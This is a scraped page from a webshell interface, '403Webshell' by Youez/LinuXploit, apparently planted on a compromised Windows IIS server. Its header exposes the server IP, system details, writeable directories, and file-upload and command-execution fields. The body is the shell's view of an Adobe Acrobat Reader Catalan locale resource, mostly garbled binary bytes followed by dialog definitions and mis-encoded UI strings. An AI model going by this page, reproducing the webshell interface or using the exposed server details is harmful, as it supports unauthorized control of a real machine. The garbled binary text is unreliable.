403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.202
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Program Files (x86)/Adobe/Acrobat Reader DC/Reader/Locale/ca_ES/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Program Files (x86)/Adobe/Acrobat Reader DC/Reader/Locale/ca_ES/WebLink.CAT
MZ����@���	�!�L�!This program cannot be run in DOS mode.

$���߹������c�����=����f���Rich��PEL�'5c�!n�m.rsrcmn@@B�8�8�P�L��������>���:���:��:��>0�'H�'`�x���������	( #	`_��HC���)z-pN0&`�{}EXVWEVEFZDCTgModeMaxLen = max(
	zstring_width(zstring: '$$$IDS_ALWAYS_SHOW'),
	zstring_width(zstring: '$$$IDS_OPTION_KEY_TO_SHOW'),
	zstring_width(zstring: '$$$IDS_NEVER_SHOW'));


dialog( name: '$$$/Dialogs/Weblink/Preferences', target_id: 'webP', margin_height: 0, margin_width: 0)
{
	cluster(name: '$$$/Dialogs/Weblink/PreferencesCluster', dheight: gPrefsPanelHeight, dwidth: gPrefsPanelWidth,
		align_children: align_left)
	{
		view( align_children: align_top )
		{
			static_text( name: '$$$/Dialogs/Weblink/Preferences/LinkInformation' );
			popup( item_id: 'mode', width: gModeMaxLen );
		}
	}
}gVerticalGapHeight = gStaticTextHeight / 4;

dialog(name: '$$$/Dialogs/Weblink/EditURL', target_id: 'eURL')
{
	group()
	{
		view(align_children: align_left)
		{
			static_text( name: '$$$/Dialogs/Weblink/EditURL/EnterURLforLink' );
			edit_text( item_id: 'dURL', width: max_char_width() * 30, PopupEdit: true);
		}
	
		gap( height: gVerticalGapHeight );
		
		ok_cancel();
	}
}gMaxQuesLen = max(
	zstring_width(zstring: '$$$IDS_ADD_QUESTION'),
	zstring_width(zstring: '$$$IDS_REMOVE_QUESTION'));

gMaxNumPLen = zstring_width(zstring: '$$$IDS_OF') + max_char_width()*6;

gVerticalGapHeight = gStaticTextHeight / 4;

dialog( name: '$$$/Dialogs/Weblink/PageRange', target_id: 'all ', first_tab: 'ques')
{
	view( align_children: align_left )
	{
		static_text( item_id: 'ques', width: gMaxQuesLen, next_tab: 'all ');

		radio( item_id: 'all ', name: '$$$/Dialogs/Weblink/PageRange/All', group_id: 'rgrp', next_tab: 'from');
		view( align_children: align_row )
		{
			radio( item_id: 'from', name: '$$$/Dialogs/Weblink/PageRange/From', group_id: 'rgrp', next_tab: 'frPg');
			edit_text( item_id: 'frPg', width: max_char_width( ) * 4, next_tab: 'tost');
			static_text( item_id: 'tost', name: '$$$/Dialogs/Weblink/PageRange/To', next_tab: 'toPg');
			edit_text( item_id: 'toPg', width: max_char_width( ) * 4, next_tab: 'NumP');
			static_text(item_id: 'NumP', width: gMaxNumPLen);
		}
		
		gap( height: gVerticalGapHeight );
		
		ok_cancel();
	}
}gMaxSettingWidth = max(
	zstring_width(zstring: '$$$/Prefs/TrustManagerURL/AlwaysAllow'),
	zstring_width(zstring: '$$$/Prefs/TrustManagerURL/AlwaysDeny'),
	zstring_width(zstring: '$$$/Prefs/TrustManagerURL/UseTrustList')) + max_char_width();
	
gMaxSetting2Width = max(
	zstring_width(zstring: '$$$/Prefs/TrustManagerURL/AlwaysAllow'),
	zstring_width(zstring: '$$$/Prefs/TrustManagerURL/AlwaysDeny'),
	zstring_width(zstring: '$$$/Prefs/TrustManagerURL/AlwaysPrompt')) + max_char_width();

gDialogWidth = 400;

dialog(item_id: 'titl', name: '$$$/Prefs/TrustManagerURL/Title')
{
	view(width: gDialogWidth, align_children: align_left)
	{
		static_text(name: '$$$/Prefs/TrustManagerURL/InfoTxt');
		
		radio(item_id: 'alal', group_id: 'stpu', name: '$$$/Prefs/TrustManagerURL/AllowAll');
		radio(item_id: 'alme', group_id: 'stpu', name: '$$$/Prefs/TrustManagerURL/AllowMe');
		radio(item_id: 'blal', group_id: 'stpu', name: '$$$/Prefs/TrustManagerURL/BlockAll');
				
		cluster(name: '$$$/Prefs/TrustManagerURL/AllowBlockCluster', width: gDialogWidth, align_children: align_left)
		{
			static_text(item_id: 'tlst', width:gDialogWidth, height: gStaticTextHeight * 1);			
			edit_text(item_id: 'edit', alignment: align_fill );
			
			view(alignment: align_fill, align_children: align_right)
			{
				view(align_children: align_row)
				{
					button(item_id: 'allu', name: '$$$/Prefs/TrustManagerURL/AllowURL');
					button(item_id: 'blku', name: '$$$/Prefs/TrustManagerURL/BlockURL');
				}
			}
		}
		
		cluster(name: '$$$/Prefs/TrustManagerURL/MySitesCluster', width: gDialogWidth, align_children: align_left)
		{
			button(item_id: 'rmv ', name: '$$$/Prefs/TrustManagerURL/Remove');
			
			mclv(item_id: 'list', alignment: align_fill, height: gEditTextHeight * 8);
			
			static_text(name: '$$$/Prefs/TrustManagerURL/OtherSitesDesc');
			
			radio(item_id: 'askm', group_id: 'defo', name: '$$$/Prefs/TrustManagerURL/AlwaysAsk');
			radio(item_id: 'alla', group_id: 'defo', name: '$$$/Prefs/TrustManagerURL/AllowAccess');
			radio(item_id: 'bloa', group_id: 'defo', name: '$$$/Prefs/TrustManagerURL/BlockAccess');
		}
		
		ok_cancel();		
	}
}dialog(name: '$$$/Dialog/Weblink/SecurityWarnDlg')
{
	column()
	{
		row()
		{
			picture(identifier: 'swar', horizontal: align_center, width:32, height:32);
			static_text(identifier: 'wtxt', name: '$$$/Dialog/Weblink/SecurityWarnDlg/MessageTxt', wrap:true, dwidth: 384 );
		}
	}
	gap( );
    checkbox(identifier: 'ract', initial:true, name: '$$$/Dialog/Weblink/SecurityWarnDlg/rememberAction', font_id:@dialog_font_bold);
    gap();
	
	column( horizontal: align_fill )
	{
		row( horizontal: align_fill )
		{
			static_text(identifier: 'help', name: '$$$/Dialog/Weblink/SecurityWarnDlg/help', hyperlink: true);		
			ok_cancel_other(ok_name:'$$$/Dialog/Weblink/SecurityWarnDlg/allow',other_name:'$$$/Dialog/Weblink/SecurityWarnDlg/block');		
		}
   	}
	
}`4VS_VERSION_INFO��"O"O?�StringFileInfo�040904b0VCompanyNameAdobe Systems Incorporated8FileDescriptionAcrobat:
FileVersion22.3.20258.00InternalNameAcrobat�WLegalCopyrightCopyright 1984-2022 Adobe Systems Incorporated and its licensors. All rights reserved.8OriginalFilenameAcrobat<ProductNameAdobe Acrobat>
ProductVersion22.3.20258.0DVarFileInfo$Translation���"IDS_ACTION_NAME=Obre un enlla� web"

"IDS_STANDARD=Est�ndard"

"IDS_NETSCAPE=Netscape 1.2"

"IDS_NETSCAPE2=Netscape Navigator"

"IDS_SPYGLASS=Spyglass"

"IDS_COMPUSERVE=CompuServe"

"IDS_AOL=America Online"

"IDS_NETSCAPE6=Netscape 6"

"IDS_MOZILLA=Mozilla"

"IDS_MENU_CREATE_URLS=&Crea enlla�os a partir dels URL..."

"IDS_MENU_REMOVE_URLS=&Elimina tots els enlla�os..."

"IDS_WEBSERVICE_MENUITEM_CREATEPDF=Crea un PD&F d'Adobe en l�nia..."

��"IDS_REAL_VERSION=A1"

"IDS_FULL_NAME=Weblink"

"IDS_LANGUAGE=CAT"

"IDS_ABOUT_LEGAL_STUFF="

"IDS_ABOUT_LEGAL_STUFF2="

"IDS_ABOUT_LEGAL_STUFF3="

"IDS_ABOUT_LEGAL_STUFF4="

"IDS_ABOUT_DESCRIPTION=El connector Acrobat Weblink d'Acrobat permet als usuaris enlla�ar amb p�gines web des de fitxers PDF."

"IDS_ABOUT_DESCRIPTION2="

"IDS_ABOUT_DESCRIPTION3="

"IDS_ABOUT_DESCRIPTION4="

"IDS_ABOUT_DEPENDENCIES=EScript"

"IDS_ABOUT_DEPENDENCIES2="

"IDS_ABOUT_DEPENDENCIES3="

"IDS_ABOUT_COPYRIGHT=(c) Copyright 1992-2006. Adobe Systems Incorporated.\nTots els drets reservats."

"IDS_ABOUT_CREDIT_STUFF="

"IDS_ABOUT_CREDIT_STUFF2="

"IDS_ABOUT_CREDIT_STUFF3="

"IDS_ABOUT_CREDIT_STUFF4="

"IDS_ABOUT_VERSION=Connector Acrobat Weblink d'Acrobat, versi� 5.0"

"IDS_ERROR_OPEN_URL=El navegador web obrir� aquest enlla�. Podria estar ocupat realitzant altres tasques."

"IDS_ERROR_NULL_LINK=No s'ha especificat cap URL. Introdu�u un URL v�lida."

"IDS_ERROR_PAGE_RANGE=Introdu�u un interval de p�gines v�lid."

"IDS_ERROR_START_RANGE=%s no �s un n�mero de p�gina v�lid. Introdu�u un n�mero de p�gina inicial v�lid."

"IDS_ERROR_END_RANGE=%s no �s un n�mero de p�gina v�lid. Introdu�u un n�mero de p�gina final v�lid."

"IDS_ERROR_VERSION=El navegador o la versi� del navegador no s�n compatibles. Si us plau, obtingueu un navegador actualitzat."

"IDS_ERROR_REENTRANT=El navegador web est� processant la vostra darrera sol�licitud. Voleu anul�lar aquesta �ltima sol�licitud?"

"IDS_ERROR_UNSUPPORTED=El navegador web no �s compatible. Seleccioneu un nou tipus de connexi� o obtingueu un navegador compatible."

"IDS_ERROR_LOCAL_LINK=No �s possible seguir aquest enlla� local: %s"

"IDS_ERROR_ACTIVATE=Acrobat no ha pogut activar el navegador web."

"IDS_ERROR_CANT_RUN=Acrobat no ha pogut obrir el navegador web. %s"

"IDS_ERROR_CANT_FIND=No s'ha especificat la ubicaci� del navegador web. Especifiqueu-la a les prefer�ncies."

"IDS_INSTRUCTIONS=Enlla�a amb un document per mitj� d'una adre�a URL del web."

"IDS_STRING1=%s"

"IDS_STRING2=Feu servir aquest bot� per definir l'URL de destinaci� per a l'enlla�."

"IDS_LINK=Enlla�:"

"IDS_LINK_ALWAYS=Mostra-ho sempre"

"IDS_LINK_CTRL=Premeu la tecla Control per mostrar-ho"

"IDS_ERROR_UNABLETOALLOCATE=Error: no s'ha pogut assignar suficient mem�ria."

"IDS_LINK_NEVER=No ho mostris mai"

"IDS_FIND_MOSAIC=Localitza el navegador web"

"IDS_PROGRAM_FILES=Fitxers de programa"

"IDS_NONE=No hi ha disponible cap controlador"

"IDS_USER_CANCEL=S'est� anul�lant la sol�licitud..."

"IDS_STRING=%s"

"IDS_URLS_ADDED=S'han afegit al document un total de %s enlla�os web."

"IDS_OF=de %ld p�gines."

"IDS_URLS_REMOVED=S'han eliminat del document un total de %s enlla�os web."

"IDS_ADD_TITLE=Crea enlla�os a partir dels URL"

"IDS_ADD_QUESTION=A quines p�gines voleu que es generin autom�ticament enlla�os web?"

"IDS_REMOVE_TITLE=Elimina els enlla�os web"

"IDS_REMOVE_QUESTION=De quines p�gines voleu que s'eliminin autom�ticament enlla�os web?"

"IDS_VARIES=<Varia>"

"IDS_NETSCAPE7=Netscape 7"

"IDS_FIREFOX=Firefox"

"IDS_NETSCAPEBROWSER=Navegador Netscape"

"IDS_BUY_ACROBAT_URL=http://www.adobe.com/cfusion/store/html/index.cfm?event=displayStoreSelector&nr=1"

"IDS_DDE_INTERNAL=S'ha produ�t un error en provar d'establir comunicaci� amb el navegador web."

"IDS_DDE_BUSY=El navegador web est� ocupat processant una altra sol�licitud. Pot ser que vulgueu portar-lo al primer pla per veure qu� est� fent."

"IDS_DDE_TIMEOUT=El navegador web no ha respost a la vostra sol�licitud durant m�s d'un minut: s'est� cancel�lant la sol�licitud."

"IDS_DDE_MEMORY=S'est� arribant a un nivell de mem�ria extremadament baix; us recomanem que tanqueu una o m�s aplicacions."

"IDS_DDE_CONNECT=No s'ha pogut establir una connexi� amb el navegador web."

"IDS_DDE_FAIL=S'ha produ�t una fallida en provar d'accedir a aquest enlla�; pot ser que l'enlla� no sigui v�lid."

"IDS_DDE_SERVERDIED=El navegador web s'ha tancat de manera inesperada. S'ha anul�lat la vostra sol�licitud d'enlla�."

"IDS_ALWAYS_SHOW=Mostra-ho sempre"

"IDS_OPTION_KEY_TO_SHOW=Premeu la tecla Opci� per mostrar-ho"

"IDS_NEVER_SHOW=No ho mostris mai"

"IDS_CROSSDOMAIN_UNKNOWN_SCHEME=El document ha demanat de carregar dades des de \"%s\", per� la pol�tica entre dominis no es pot verificar per a URL amb aquest esquema."

"IDS_MENU_ABOUT=Enlla�os web"

"IDS_MENU_PREFS=Enlla�os web"

"IDS_MENU_HELP=�s d'Acrobat &Weblink"

"IDS_ABOUT_LEGAL=&Legal"

"IDS_ABOUT_CREDITS=&Cr�dits"

"IDS_ALL_FILES=Tots els fitxers"

"IDS_BUTTON_TEXT=Edita l'&URL..."

"IDS_CREATING_LINKS=S'estan creant enlla�os web"

"IDS_REMOVING_LINKS=S'estan eliminant enlla�os web"

"IDS_WEBSERVICE_TOOLBUTTON_CREATEPDF=Crea un PDF d'Adobe en l�nia"

"IDS_CAN_LAUNCH_MESSAGE=El document est� provant de connectar-se amb: \n\t%1\n\nConfieu en %2? Si confieu en aquest lloc, seleccioneu Permet-ho. Si no confieu en el lloc, seleccioneu Bloca-ho."

"IDS_CANNOT_BE_UNDONE=Aquesta operaci� no es pot desfer. Voleu continuar?"

"IDS_WINEXEC_GENERAL=Error desconegut."

"IDS_WINEXEC_OUTOFMEMORY=El sistema s'ha quedat sense mem�ria, el fitxer executable est� danyat o les reubicacions no eren v�lides."

"IDS_WINEXEC_FILENOTFOUND=No s'ha trobat el fitxer."

"IDS_WINEXEC_PATHNOTFOUND=No s'ha trobat el cam�."

"IDS_WINEXEC_NETWORKERROR=Hi ha hagut un intent d'enlla�ar de manera din�mica amb una tasca, o s'ha produ�t un error de compartici� o de protecci� de xarxa."

"IDS_WINEXEC_SEPDATASEGS=La biblioteca necessitava diferents segments de dades per a cada tasca."

"IDS_WINEXEC_OUTOFMEMORY2=No hi mem�ria suficient per iniciar l'aplicaci�."

"IDS_WINEXEC_DIFFOS=L'aplicaci� s'ha dissenyat per a un altre sistema operatiu."

"IDS_WINEXEC_MSDOS4=L'aplicaci� s'ha dissenyat per a MS-DOS 4.0."

"IDS_WINEXEC_EXEUNKNOWN=El tipus de fitxer executable �s desconegut."

"IDS_WINEXEC_SECONDINST=Hi ha hagut un intent de carregar una segona ocurr�ncia d'un fitxer executable que cont� diversos segments de dades que no estaven marcats com a \"nom�s lectura\"."

"IDS_WINEXEC_COMPRESSED=Hi ha hagut un intent de carregar un fitxer executable comprimit. Cal descomprimir el fitxer abans de poder-lo carregar."

"IDS_WINEXEC_DLLINVALID=El fitxer de biblioteca de connexi� din�mica (DLL) no era v�lid. Una de les DLL necess�ries per executar aquesta aplicaci� estava malmesa."

"IDS_WINEXEC_VERSION=La versi� de Windows no era correcta."

"IDS_WINEXEC_EXEBAD=El fitxer executable no �s v�lid. O b� no es tracta d'una aplicaci� de Windows o b� s'ha produ�t un error en la imatge .EXE."

"IDS_WINEXEC_REALMODE=Hi ha hagut un intent de carregar una aplicaci� en mode real (desenvolupada per a una versi� anterior de Windows)."

"IDS_WINEXEC_32BIT=L'aplicaci� requereix extensions de Microsoft Windows de 32 bits."

"IDS_ERROR_WIN98MEDIAPLAYER=Hi ha hagut un problema de sistema en utilitzar el Microsoft Windows Media Player en Windows 98. Sortiu del Windows Media Player i seleccioneu D'acord."

"IDS_UNIX_WEB_RESPONSE_TITLE="

"IDS_UNIX_WEB_RESPONSE_QUESTION="

"IDS_UNIX_BAD_BROWSER="

"IDS_DONOTSHOWMESSAGEAGAIN="

"IDS_BROWSER_SELECTION="

"IDS_ABOUTCREDITBUTTON="

"IDS_ABOUTLEGALBUTTON="

"IDS_ABOUTTITLE="

"IDS_NCSACANCELBUTTON="

"IDS_NCSALAUNCHBUTTON="

"IDS_NCSALAUNCHQUESTION="

"IDS_NCSATRYAGAINBUTTON="

"IDS_NETSCAPECANCELBUTTON="

"IDS_NETSCAPELAUNCHBUTTON="

"IDS_NETSCAPELAUNCHQUESTION="

"IDS_NETSCAPETRYAGAINBUTTON="

"IDS_UNIX_BROWSER_WEB_NETSCAPE_NAME="

"IDS_UNIX_BROWSER_WEB_NETSCAPE_EXE="

"IDS_UNIX_BROWSER_WEB_MOZILLA_NAME="

"IDS_UNIX_BROWSER_WEB_MOZILLA_EXE="

"IDS_PREFS_PANEL_NAME="

"IDS_FILE_URL_NOT_ALLOWED=No s'admeten els URL dels fitxers locals. Introdu�u un URL v�lid que comenci per http:// o https://."

"$$$/ControlsStrings/OK=D'acord"

"$$$/ControlsStrings/Cancel=Anul�la"

"$$$/Dialogs/Weblink/EditURL=Edita l'URL"

"$$$/Dialogs/Weblink/EditURL/EnterURLforLink=Introdu�u un URL per a aquest enlla�:"

"$$$/Dialogs/Weblink/PageRange=Crea/elimina enlla�os web"

"$$$/Dialogs/Weblink/PageRange/All=&Tot"

"$$$/Dialogs/Weblink/PageRange/From=&Des de"

"$$$/Dialogs/Weblink/PageRange/To=Fins a"

"$$$/Prefs/TrustManagerURL/Title=Gestiona l'acc�s a internet"

"$$$/Prefs/TrustManagerURL/InfoTxt=Els fitxers PDF poden connectar-se a llocs web per compartir o obtenir informaci�."

"$$$/Prefs/TrustManagerURL/ListDesc=Nom de l'amfitri� (www.example.com):"

"$$$/Prefs/TrustManagerURL/AllowBlockCluster=Especifica els llocs web per permetre o blocar"

"$$$/Prefs/TrustManagerURL/MySitesCluster=Llocs web"

"$$$/Prefs/TrustManagerURL/AlwaysAllow=Permet-ho sempre"

"$$$/Prefs/TrustManagerURL/AlwaysDeny=Bloca-ho sempre"

"$$$/Prefs/TrustManagerURL/AlwaysPrompt=Pregunta-m'ho sempre"

"$$$/Prefs/TrustManagerURL/UseTrustList=Fes servir la llista de confian�a"

"$$$/Prefs/TrustManagerURL/AllowURL=&Permet-ho"

"$$$/Prefs/TrustManagerURL/BlockURL=&Bloca-ho"

"$$$/Prefs/TrustManagerURL/Remove=&Suprimeix"

"$$$/Prefs/TrustManagerURL/OtherSitesDesc=Comportament predeterminat per als llocs web que no apareixen a la llista anterior:"

"$$$/Prefs/TrustManagerURL/Site=Nom"

"$$$/Prefs/TrustManagerURL/Status=Acc�s"

"$$$/Prefs/TrustManagerURL/AllowMe=Par�&metre personalitzat"

"$$$/Prefs/TrustManagerURL/AllowAll=Permet &l'acc�s dels fitxers PDF a tots els llocs web"

"$$$/Prefs/TrustManagerURL/BlockAll=Bl&oca l'acc�s dels fitxers PDF a tots els llocs web"

"$$$/Prefs/TrustManagerURL/AlwaysAsk=P&regunta-m'ho sempre"

"$$$/Prefs/TrustManagerURL/AllowAccess=Permet l'acc&�s"

"$$$/Prefs/TrustManagerURL/BlockAccess=Bloca l'&acc�s"

"$$$/Dialog/Weblink/SecurityWarnDlg=Av�s de seguretat"

"$$$/Dialog/Weblink/SecurityWarnDlg/MessageTxt=El document est� provant de connectar-se a:\r\n%1\r\n\nSi confieu en aquest lloc, seleccioneu Permet-ho. Si no hi confieu, seleccioneu Bloca-ho."

"$$$/Dialog/Weblink/SecurityWarnDlg/rememberAction=&Recorda l'acci� en aquest lloc per a tots els documents PDF"

"$$$/Dialog/Weblink/SecurityWarnDlg/allow=&Permet-ho"

"$$$/Dialog/Weblink/SecurityWarnDlg/help=&Ajuda"

"$$$/Dialog/Weblink/SecurityWarnDlg/block=&Bloca-ho"

<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>

Youez - 2016 - github.com/yon3zu
LinuXploit